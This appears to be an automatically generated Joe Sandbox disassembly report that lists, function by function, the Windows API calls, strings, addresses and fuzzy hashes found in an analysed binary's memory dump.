Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
Instruction ID: eb0ce2326c29df55cf4023aff4652bd8236e8c6667afc9ead5890f1c69a3e28f
Opcode Fuzzy Hash: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
Instruction Fuzzy Hash: 1311383266D347BAE715EF14DC82CEB679C9F1A3A0F10442AF904661C2DAB06F6445A4

Function 002B42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4312
LoadStringW.USER32(00000000), ref: 002B4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B432F
LoadStringW.USER32(00000000), ref: 002B4336
_wprintf.LIBCMT ref: 002B435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 002B4357

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
Instruction ID: 0b07c05575a8a4f2f3dc22f4fcee26cba207fe55d429819b88771cf937a9fbf2
Opcode Fuzzy Hash: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
Instruction Fuzzy Hash: F00162F2D01208BFE751ABA4EE8DEE6776CDB08300F1045A6B74AE2051EA749E954B74

Function 002DD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetSystemMetrics.USER32(0000000F), ref: 002DD47C
GetSystemMetrics.USER32(0000000F), ref: 002DD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DD716
ShowWindow.USER32(00000003,00000000), ref: 002DD735
InvalidateRect.USER32(?,00000000,00000001), ref: 002DD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 002DD77D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
Instruction ID: 462fd722b6efd3f13201d8fd4de1b0552a51cd1008fbe57f6342b9a41b99f06e
Opcode Fuzzy Hash: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
Instruction Fuzzy Hash: EDB19B75A00A16EFDF14CF68C9857AD7BB5BF08701F0880AAEC489B295D770AD60CB90

Function 00252A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 00252ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00252B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C286

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
Instruction ID: b67c92e719c37bfdf96e9c7889df04f50465204058672653711f8b14bf095be5
Opcode Fuzzy Hash: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
Instruction Fuzzy Hash: 7B414B34635681DAC7399F289C8CB6A7B95AB87301F248419EC87425E0C770DC6DD728

Function 002B70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002B70DD

Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B7114
EnterCriticalSection.KERNEL32(?), ref: 002B7130
_memmove.LIBCMT ref: 002B717E
_memmove.LIBCMT ref: 002B719B
LeaveCriticalSection.KERNEL32(?), ref: 002B71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 002B71DE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: d3bb7ae42608d5ccaef8f6a9641b5c04254583552e581b805c85160219590b28
Instruction ID: 1f1a4a0bb402ab2ef3879a7269bc9df3386a854602f7a8fbbac1d44d9fdc6693
Opcode Fuzzy Hash: d3bb7ae42608d5ccaef8f6a9641b5c04254583552e581b805c85160219590b28
Instruction Fuzzy Hash: A7315031910205EBDB10DFA4DD89AAFB778EF45710F1481A6F9089B256DB709E24CB64

Function 002D61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002D61EB
GetDC.USER32(00000000), ref: 002D61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D61FE
ReleaseDC.USER32(00000000,00000000), ref: 002D620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 002D6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D62B1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
Instruction ID: 3e41f29eb26b5276d8e5c882dfd1611875a730ae2cf403aff5f7cbaa702d6022
Opcode Fuzzy Hash: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
Instruction Fuzzy Hash: 68319C72201210BFEB118F20DC8EFEA3BADEF49761F044066FE099A291C6759C51CBA4

Function 002BEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9

_wcstok.LIBCMT ref: 002BEC94
_wcscpy.LIBCMT ref: 002BED23
_memset.LIBCMT ref: 002BED56

Strings

X, xrefs: 002BED93

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 8c54198d97145339714f6f86f4edb3932e7eb4bc77d199845fc1cf0315f40b3a
Instruction ID: dfed5f1d85f5b2a03ac38ec98e5b8ee91d0e5f206658f4e73b316003e9a71f50
Opcode Fuzzy Hash: 8c54198d97145339714f6f86f4edb3932e7eb4bc77d199845fc1cf0315f40b3a
Instruction Fuzzy Hash: C4C19130528301DFCB14EF24D855AAAB7E4BF45351F04492DF899972A2DB30EC69CF86

Function 002C6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C6C21
WSAGetLastError.WSOCK32(00000000), ref: 002C6C34
htons.WSOCK32(?,?,?,00000000,?), ref: 002C6CEA
inet_ntoa.WSOCK32(?), ref: 002C6CA7

Part of subcall function 002AA7E9: _strlen.LIBCMT ref: 002AA7F3
Part of subcall function 002AA7E9: _memmove.LIBCMT ref: 002AA815

_strlen.LIBCMT ref: 002C6D44
_memmove.LIBCMT ref: 002C6DAD

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a1d7264592d0f6fabd881dde712f90e9c89774ca9c6ae6eead922cf7bf46e46a
Instruction ID: 73672519714e61faf845edf01dbed8220a2f72fb80cfd4f4dac8425a1050789d
Opcode Fuzzy Hash: a1d7264592d0f6fabd881dde712f90e9c89774ca9c6ae6eead922cf7bf46e46a
Instruction Fuzzy Hash: 5481F371224301ABD710EF24CC89F6BB7E8AF84714F144A1DF9569B2A2DB70DD14CB95

Function 00251424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4954872706af93065c570a3710b25f983565f7d7ff3d8071773664cca4d8bf0
Instruction ID: d053bd482257fec3a53742454c29dff2f901b3028fee9cf13e1bc39002c37c16
Opcode Fuzzy Hash: d4954872706af93065c570a3710b25f983565f7d7ff3d8071773664cca4d8bf0
Instruction Fuzzy Hash: 92719A3491010AEFCB05DF98CC49ABEBB79FF85311F148149F915AA291C730AA25CFA8

Function 002DB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013E59A8), ref: 002DB3EB
IsWindowEnabled.USER32(013E59A8), ref: 002DB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002DB4DB
SendMessageW.USER32(013E59A8,000000B0,?,?), ref: 002DB512
IsDlgButtonChecked.USER32(?,?), ref: 002DB54F
GetWindowLongW.USER32(013E59A8,000000EC), ref: 002DB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DB589

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 2ded65fb99e0861e5f788811c6f4580a059090353b3a08b1abb49c18c7e366aa
Instruction ID: 63c1ef1a7b720d457d6f6315b0a025d9a8dc544c051f00b9b866c50541a5b887
Opcode Fuzzy Hash: 2ded65fb99e0861e5f788811c6f4580a059090353b3a08b1abb49c18c7e366aa
Instruction Fuzzy Hash: B971A038615206EFDB26DF54C8B4FBA77B9EF49300F15805AE942973A2C731AC60DB50

Function 002CF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002CF448
_memset.LIBCMT ref: 002CF511
ShellExecuteExW.SHELL32(?), ref: 002CF556

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9

GetProcessId.KERNEL32(00000000), ref: 002CF5CD
CloseHandle.KERNEL32(00000000), ref: 002CF5FC

Strings

@, xrefs: 002CF525

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 1bd1817b3c782124da33880df5d08d18815dd541123d37c5f8e5249b5588094d
Instruction ID: fd495e8aab8b8c4ba880f15d2fc470a2b23213814ab925da2e39cf2d025e50e1
Opcode Fuzzy Hash: 1bd1817b3c782124da33880df5d08d18815dd541123d37c5f8e5249b5588094d
Instruction Fuzzy Hash: A161BB70A20619DFCB14DF64C984AAEBBB5FF49310F14816DE81AAB351CB30AD65CF84

Function 002B0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 002B0F8C
GetKeyboardState.USER32(?), ref: 002B0FA1
SetKeyboardState.USER32(?), ref: 002B1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 002B1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 002B104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 002B1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B10B8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
Instruction ID: 88a56f54a746f684d684ce94c7c706bfbe2d70e7062541d271b75f50672df7be
Opcode Fuzzy Hash: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
Instruction Fuzzy Hash: F1513460A243D23DFB325A388C65BF7BEA95B06380F488989E5D9458C3C2D8ECF4D751

Function 002B0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 002B0DA5
GetKeyboardState.USER32(?), ref: 002B0DBA
SetKeyboardState.USER32(?), ref: 002B0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B0EC9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
Instruction ID: 7e69701d5d3990b01b4d6730dd9647c276c44e0f6ff1452e26a76f77039213d3
Opcode Fuzzy Hash: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
Instruction Fuzzy Hash: A451F5A09247D63DFB338B648C95BFB7FA99B06340F088889E1D5468C2D795ECA4D750

Function 002B55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 002B560A
_wcsncpy.LIBCMT ref: 002B563F
_wcsncpy.LIBCMT ref: 002B5671
_wcsncpy.LIBCMT ref: 002B56A4
_wcsncpy.LIBCMT ref: 002B56E6
_wcsncpy.LIBCMT ref: 002B5720
_wcsncpy.LIBCMT ref: 002B574F

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: e8bdb2dde9bb158ad79eafa90406cd602c3a2faae0c16c657781924afe888a41
Instruction ID: 394bd4af07496a582bbdf691e238687b7640167aa50e2ab486e30e71a012eec4
Opcode Fuzzy Hash: e8bdb2dde9bb158ad79eafa90406cd602c3a2faae0c16c657781924afe888a41
Instruction Fuzzy Hash: E8418375C30614B6CB11EBB48C46ACFB3BC9F05310F50D956E518E3221FB34A665CBAA

Function 002AD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002AD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002AD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002AD69D

Strings

,,., xrefs: 002AD578
DllGetClassObject, xrefs: 002AD610

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,.$DllGetClassObject
API String ID: 753597075-1173203973
Opcode ID: e4cde0a690fa1ed7f7d166cf20237efa296a9902bc00ce196a362d049cfd57cb
Instruction ID: 6be22daf11dade5192ca90226aa7dcbd5969c14c481bdc347039b74537bfce98
Opcode Fuzzy Hash: e4cde0a690fa1ed7f7d166cf20237efa296a9902bc00ce196a362d049cfd57cb
Instruction Fuzzy Hash: 174191B1610205EFDB05CF54D884B9ABBBDEF45710F1580A9EC0A9F605DBB1DD54CBA0

Function 002B3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B

Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4

lstrcmpiW.KERNEL32(?,?), ref: 002B36B7
_wcscmp.LIBCMT ref: 002B36D3
MoveFileW.KERNEL32(?,?), ref: 002B36EB
_wcscat.LIBCMT ref: 002B3733
SHFileOperationW.SHELL32(?), ref: 002B379F

Strings

\*.*, xrefs: 002B372D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 1585d1ad535aa09a0a50f32689a06240879fb784782137bb6a595afdfdad3e90
Instruction ID: b0f4f65956e632e065bf36a18c0330221394741a42ccfdf5182e67b874c81b2d
Opcode Fuzzy Hash: 1585d1ad535aa09a0a50f32689a06240879fb784782137bb6a595afdfdad3e90
Instruction Fuzzy Hash: 9D41E171518345AEC751EF60C881AEFB7ECAF88380F00482EF48AC3251EB34D699CB56

Function 002D7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7351
IsMenu.USER32(?), ref: 002D7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D73B1
DrawMenuBar.USER32 ref: 002D73C4

Strings

0, xrefs: 002D729E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
